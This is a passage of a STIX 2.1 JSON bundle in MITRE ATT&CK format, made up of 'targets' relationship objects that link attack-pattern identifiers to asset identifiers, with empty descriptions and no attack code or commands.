"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a8b370d3-3a20-495b-9624-935368abe697", "created": "2024-07-01T10:37:15.827711", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827714", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--59d4f40b-d0e6-4874-a11b-c8abfde472e0", "created": "2024-07-01T10:37:15.827721", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827724", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c7ada7a7-5d13-446d-9ca3-4b739048c711", "created": "2024-07-01T10:37:15.827731", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827733", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4dd3a839-dc29-4de1-aad2-a11632b33efb", "created": "2024-07-01T10:37:15.827741", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827743", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--802a3acd-268e-4f6e-b47d-c63ed73f8a49", "created": "2024-07-01T10:37:15.827751", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827753", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--43f7ccf6-7506-40c9-8c6a-f748de9c0e8b", "created": "2024-07-01T10:37:15.827761", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827763", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7d0c6133-3667-494e-aaba-5145ec23df2e", "created": "2024-07-01T10:37:15.827771", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827773", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--45b3f34e-d75f-4f68-b790-7b1de55874e3", "created": "2024-07-01T10:37:15.827781", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827783", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--42c688d9-cd68-460d-ac70-d3b9aa138183", "created": "2024-07-01T10:37:15.827791", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827793", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e44a49c9-f5e0-4c7e-aaa4-201d550327f1", "created": "2024-07-01T10:37:15.827801", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827803", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c2a1c9e3-3830-48e4-9a0b-5acc774ceb7f", "created": "2024-07-01T10:37:15.827811", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827813", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2f04b3f1-924e-4e25-89a1-22963ced58dd", "created": "2024-07-01T10:37:15.827821", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827823", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7bbde1c3-93b0-45f5-8444-5a4642acca69", "created": "2024-07-01T10:37:15.827830", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827833", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3ea8c842-383c-48ee-90f9-1d72b984fc2a", "created": "2024-07-01T10:37:15.827840", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827842", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7c3ebb5e-9113-4577-8323-b85313dd71d4", "created": "2024-07-01T10:37:15.827850", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827852", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--13a905b1-f389-4e91-9f66-cd784f0c2ccf", "created": "2024-07-01T10:37:15.827860", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827862", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--950b3f08-bcef-4f9a-9e00-f328548cb10f", "created": "2024-07-01T10:37:15.827871", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827873", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5ebb2d07-0701-4b28-832a-9b5843967dfe", "created": "2024-07-01T10:37:15.827881", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827883", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5cab56e1-f6fd-4760-b586-e2515a935a46", "created": "2024-07-01T10:37:15.827891", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827893", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa0ece54-09c7-40aa-b7bc-45c51988ae33", "created": "2024-07-01T10:37:15.827901", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827903", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--de2960ce-c4f9-4965-b270-238f84a3c733", "created": "2024-07-01T10:37:15.827910", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827913", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0dc062c1-7a29-4ae6-9c4f-9e4f688dd421", "created": "2024-07-01T10:37:15.827921", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827923", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9f604b94-8878-4b80-bebe-bc14615479e8", "created": "2024-07-01T10:37:15.827931", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827933", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--32040632-bf47-4e7b-bd29-75ea026c5de3", "created": "2024-07-01T10:37:15.827941", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827943", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe886a65-a9c5-49c1-ad1d-1b5b675598f1", "created": "2024-07-01T10:37:15.827951", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827954", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--393076b4-663a-47f9-baa9-a45be60d8b4d", "created": "2024-07-01T10:37:15.827961", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827964", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8c1f97a8-652b-40c2-8d06-da8387cf1abb", "created": "2024-07-01T10:37:15.827971", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827973", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--933e0c0b-165b-478d-a543-45fbd176315a", "created": "2024-07-01T10:37:15.827981", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827983", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c9a1190-31d0-47fd-acd8-87f3fe93454c", "created": "2024-07-01T10:37:15.827991", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.827993", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5e7f7fbe-3dec-444f-9c77-42c94b61f11f", "created": "2024-07-01T10:37:15.828001", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828003", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--421df749-30e3-46ba-9257-cb261f744fc2", "created": "2024-07-01T10:37:15.828011", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828013", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--528d722e-2fed-451f-8f35-9462c7e80244", "created": "2024-07-01T10:37:15.828021", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828023", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--98aea87f-7040-4d86-82fa-8ccffa088682", "created": "2024-07-01T10:37:15.828031", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828033", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--08f4b3b8-2c04-4b87-a5a9-35ecc7dfaa72", "created": "2024-07-01T10:37:15.828041", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828043", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--87b776ae-773f-491d-afff-f8c090f5a0a4", "created": "2024-07-01T10:37:15.828051", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828053", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7f521379-1597-4d04-a355-b76204dcd1de", "created": "2024-07-01T10:37:15.828061", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828063", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b13fbc4b-1c91-4d23-a6d8-1fd29b704164", "created": "2024-07-01T10:37:15.828071", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828073", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ffc604e3-679e-422e-b447-a8be5daed7ce", "created": "2024-07-01T10:37:15.828081", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828083", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--17708589-b2f5-4d53-8786-7ad41efefc19", "created": "2024-07-01T10:37:15.828091", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828093", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e3466ae4-2108-438d-b256-3ba4fcf30f71", "created": "2024-07-01T10:37:15.828102", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828104", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c7a70901-5621-4a1b-b274-6fc37458fbf1", "created": "2024-07-01T10:37:15.828111", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.828114", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": 